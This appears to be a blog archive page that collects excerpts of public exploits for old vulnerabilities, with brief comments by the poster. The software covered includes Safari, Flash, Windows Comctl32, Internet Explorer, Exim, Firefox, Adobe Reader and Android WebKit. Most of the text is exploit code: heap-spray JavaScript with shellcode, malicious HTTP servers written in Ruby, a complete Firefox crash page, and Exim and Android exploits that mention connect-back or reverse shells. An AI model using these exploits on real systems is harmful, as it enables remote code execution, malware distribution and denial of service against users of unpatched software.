Category: Vulnerability

Safari 5.0.5 SVG Remote Code Execution Exploit (DEP bypass)

I'm noting this down since it could also be used to distribute malware. http://www.exploit-db.com/exploits/17575/
[code]<html><head><script>/ Abysssec Public Advisory apple killed one of our 0day no point to keep it private anymore 🙁 there is another version of exploit using POPup and thats more reliable but as you know safari block pop up by default so we found a cool …

Adobe Flash Player 0-day Exploit (CVE-2011-0611)

The following code is reportedly found in SWF files related to the CVE-2011-0611 vulnerability.
[code]Date.prototype.c_fun = SharedObject.prototype.getSize;
Date.prototype.getDay = function () {this.c_fun();};
var eval(0) = new Date(1.41466385537348e-315);
(eval(0)).getDay();[/code]
[code]Date.prototype.getDay = SharedObject.prototype.getSize;
var d = new Date(8.30830068348057E-246);
var __callResult_19 = d.getDay();[/code]

Windows Common Control Library (Comctl32) Heap Overflow (MS10-081, CVE-2010-2746)

[code]#!/usr/bin/env ruby
# http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
# Nephi Johnson
require 'socket'
def http_send(sock, data, opts={})
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
    opts = defaults.merge(opts)
    code = opts[:code]
    message = opts[:message]
    type = opts[:type]
    date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
    headers = "HTTP/1.1 #{code} #{message}\r\n" +
      …

Internet Explorer Uninitialized Memory Corruption Vulnerability (MS09-002, CVE-2009-0075)

[code]<SCRIPT LANGUAGE="JavaScript">
<!-- Hide
function killErrors() { return true; }
window.onerror = killErrors;
// -->
</SCRIPT>
<script language="JavaScript">
var aaa4='omitted';
var aa4=(aaa4.replace(/MV/g,"%u"));
var shellcode=unescape(aa4);
var array = new Array();
var calc = 0x100000-(shellcode.length*2+0x01020);
var point = unescape("%u0D0D%u0D0D");
while(point.length<calc) { point+=point;}
var sec = point.substring(0,calc/2);
delete point;
for(i=0; i<0xD0; i++) {array[i] = sec + shellcode;}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var …

Internet Explorer 8 CSS Parser Exploit – (CVE-2010-3971, MS11-003)

A vulnerability affecting Internet Explorer 8 has come out, so I'm noting it here. http://www.exploit-db.com/exploits/15746/
[code]#!/usr/bin/env ruby
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)
require 'socket'
def http_send(sock, data, opts={})
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
    opts = defaults.merge(opts)
    code = opts[:code]
    message = opts[:message]
    type = opts[:type]
    to_send = "HTTP/1.1 #{code} #{message}\r\n" …

Exim 4.63 Remote Exploit

A vulnerability in Exim 4.63 that allows obtaining root privileges remotely has been published. It has been a while since I've seen a remotely rootable vulnerability.
[code]#Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope
#Modified perl version of metasploit module
=for comment
use this connect back shell as "trojanurl" and be sure to setup a netcat,
—snip—
$system = '/bin/sh';
$ARGC=@ARGV;

Mozilla Firefox <= 3.6.12 Remote Denial Of Service

Firefox vulnerabilities have been coming out frequently lately.. unsettling -_- Source: http://www.exploit-db.com/exploits/15498/
[code]<!--
    0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service
    Credits:
    Emanuele 'emgent' Gentili    <emgent@backtrack-linux.org>
    Marco 'white_sheep' Rondini    <white_sheep@backtrack-linux.org>
    Alessandro 'scox' Scoscia    <scox@backtrack.it>
-->
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++){    document.write("a");}
for (i=0;i<=3;i++){    document.write(document.body.innerHTML);}
</script>[/code]

Adobe Reader 관련 취약점 정리

Countless Adobe-related vulnerabilities have poured out and keep coming. Since it seems a summary is needed, I'm organizing them here. I'll keep updating whatever is missing; for now just these...... I hear it will move to a sandbox model later, but will it really?
# util.printf – CVE-2008-2992
[code]Adobe Reader Javascript Printf Buffer Overflow Exploit
===========================================================
Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
CVE-2008-2992
Thanks to coresecurity for the technical background.
6Nov,2008: Exploit released by me
Credits: Debasis Mohanty
www.hackingspirits.com
www.coffeeandsecurity.com
===========================================================
//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
//www.coffeeandsecurity
//www.hackingspirits.com
// win32_bind –  …

Android 2.0-2.1 Reverse Shell Exploit – CVE-2010-1807

A remotely exploitable vulnerability has been confirmed on Android.. Leaving it here for the record. Source: http://www.exploit-db.com/exploits/15423/, http://www.exploit-db.com/exploits/15548/
[code]<html><head><script>
// bug   =  webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
//           listed as a safari bug but also works on android 🙂
//tested =  moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 – 2.1
//patched=  android 2.2
//author =   mj
// hardcoded …

Internet Explorer Memory Corruption 0day Vulnerability – CVE-2010-3962, MS10-090

Another Internet Explorer vulnerability has come out. I'm noting it here since it could be used to distribute malware. Source: http://www.exploit-db.com/exploits/15421/
[code]# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962
# Tested on Windows XP SP3 IE6 IE7 IE8
# Coded by Matteo Memelli ryujin at offsec.com
# http://www.offensive-security.com/0day/ie-0day.txt
# Thx to dookie at offsec.com
# notes    : This is a quick and dirty exploit! No DEP/ASLR bypass …